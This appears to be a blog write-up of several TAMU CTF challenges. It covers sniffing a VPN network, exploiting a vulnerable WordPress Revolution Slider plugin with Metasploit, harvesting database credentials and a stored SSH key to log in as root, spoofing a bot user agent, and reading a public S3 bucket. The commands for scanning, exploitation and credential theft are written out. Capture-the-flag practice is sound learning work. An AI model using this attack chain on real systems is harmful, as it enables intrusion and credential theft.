Another great CTF that my team and I participated in last week! TAMU CTF had a wide range of challenges, which made for a nice experience. It ran for a whole week and is organized by Texas A&M University students!
Now for the challenges I solved!
1. Stop and Listen
As the challenge name says, all we have to do is listen. The objective is to sniff packets on the network and get the flag. I connected to the network via VPN using the instructions provided, then fired up Wireshark to sniff packets on tap0, the network interface created by the VPN. The flag is there in plain text.
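If you prefer the terminal to Wireshark, the same sniff can be sketched with tcpdump; the `gigem{...}` flag pattern is an assumption based on TAMU CTF's usual flag format:

```shell
# Dump ASCII payloads from the VPN interface and pull out anything that
# matches the assumed flag format (gigem{...}).
sudo tcpdump -i tap0 -A | grep -o 'gigem{[^}]*}'
```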
I setup my own Wordpress site!
I love that there are so many plugins. My favorite is Revolution Slider. Even though it’s a little old it doesn’t show up on wpscan!
Please give it about 30 seconds after connecting for everything to setup correctly.
The flag is in
This was a really cool one, because we have to exploit the WordPress site through the mentioned plugin and escalate through the DB to get to root.
First, run nmap on the network to find the IPs.
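A sketch of the scan; the 172.30.0.0/24 subnet is an assumption based on the DB address (172.30.0.2) that comes up later — use whatever route the VPN actually pushed:

```shell
# Ping-scan the subnet for live hosts, then extract their IPs from nmap's
# grepable (-oG) output. Follow up with nmap -sV <ip> to identify services.
nmap -sn 172.30.0.0/24 -oG - | awk '/Status: Up/{print $2}'
```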
There are two hosts up on the network: one running the database, and the other running SSH and the web server.
After visiting the website and clicking around, there wasn't much I could find on the site, so I decided to check whether the mentioned plugin is indeed vulnerable by running wpscan.
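The scan looks something like this; the URL is a placeholder for the web host found with nmap, and `vp` tells wpscan to enumerate vulnerable plugins:

```shell
# Enumerate vulnerable plugins (vp) on the target WordPress site.
# <webserver-ip> is a placeholder for the host found during the nmap scan.
wpscan --url http://<webserver-ip>/ --enumerate vp
```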
Now that wpscan has confirmed the vulnerability, let's exploit it with the available Metasploit module and get a shell.
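The Metasploit side looks roughly like this; the module path is the public Revolution Slider file-upload module as I remember it, and the target IP is a placeholder:

```shell
# Launch the Revolution Slider arbitrary-file-upload exploit non-interactively.
# Module path and options are from memory of the public module; verify with
# "search revslider" inside msfconsole. <webserver-ip> is a placeholder.
msfconsole -q -x "use exploit/unix/webapp/wp_revslider_upload_execute; set RHOSTS <webserver-ip>; run"
```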
After firing up Metasploit and running the exploit to get a shell, I changed to the www directory to check for configs. There's a note.txt with a message saying an SSH key was placed on the DB server.
Getting DB credentials:
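The credentials live in wp-config.php in the WordPress root; the DB_* constants below are standard WordPress (not challenge-specific), so a quick grep from the shell we got pulls them out:

```shell
# Pull the standard WordPress database constants out of the site config.
grep -E "DB_(NAME|USER|PASSWORD|HOST)" wp-config.php
```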
Now we can log in to the DB server using this command.
mysql -u wordpress -h 172.30.0.2 -p
After logging in, I explored the tables and ran a SELECT query to read the SSH private key.
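A sketch of that exploration; the `<db>` and `<table>` names below are placeholders for what poking around the database actually turned up, not the challenge's real names:

```shell
# Explore the database non-interactively with -e, then dump the table
# holding the key. <db> and <table> are placeholders.
mysql -u wordpress -h 172.30.0.2 -p -e 'SHOW DATABASES;'
mysql -u wordpress -h 172.30.0.2 -p -e 'USE <db>; SHOW TABLES;'
mysql -u wordpress -h 172.30.0.2 -p -e 'SELECT * FROM <db>.<table>;'
```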
I copied the key, saved it to a file (with its permissions set to 600, as SSH requires), and ran this command to SSH in. I knew root was the user to use because when I checked the /etc/passwd file there was no other user listed.
ssh -i ssh.key root@<webserver-ip>
Finally the flag:
To be updated
2. Robots Rule
This was an easy one; the moment I saw the title I had a pretty good idea of what the challenge was. My guess was that we have to change the user agent to a bot's. So I visited the link, intercepted the request using Burp, and changed the user agent to Googlebot 2.1, but nothing changed. Then I thought, let me visit the robots.txt file, and got this.
I set the bot user agent again when visiting the robots.txt file to see if the message changed, and got the flag.
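Outside of Burp, the same check can be done with curl; its `-A` flag sets the User-Agent header, and the host below is a placeholder for the challenge URL:

```shell
# Request robots.txt while pretending to be Googlebot; -A sets User-Agent.
# <challenge-host> is a placeholder for the actual challenge URL.
curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://<challenge-host>/robots.txt
```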
This link below has some bot user agents, but in this case I used a Googlebot one.
Crawler User Agents
Checkout my s3 bucket website!
Visiting the link provided, we get this web page.
Nothing interesting there, so checking the source of the page, there are some comments.
It's clear that the challenge has something to do with AWS S3 buckets. Maybe the bucket listed in the comments is our solution. However, visiting it directly we get a 404 Not Found.
So then I googled how s3 buckets work and got to this page:
Working with Amazon S3 Buckets - Amazon Simple Storage Service
After reading through the document, I learn that to access an AWS bucket the link is in this format: http://<bucket>.s3.amazonaws.com. So I update the link and get access. Scrolling through, I come across the flag.txt.
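In curl terms it looks like this; `<bucket>` is a placeholder standing in for the bucket name found in the page's HTML comments:

```shell
# Virtual-hosted-style S3 URL: the bucket name becomes part of the hostname.
# <bucket> is a placeholder for the name from the page comments.
curl http://<bucket>.s3.amazonaws.com/          # bucket listing (XML)
curl http://<bucket>.s3.amazonaws.com/flag.txt  # fetch the flag object
```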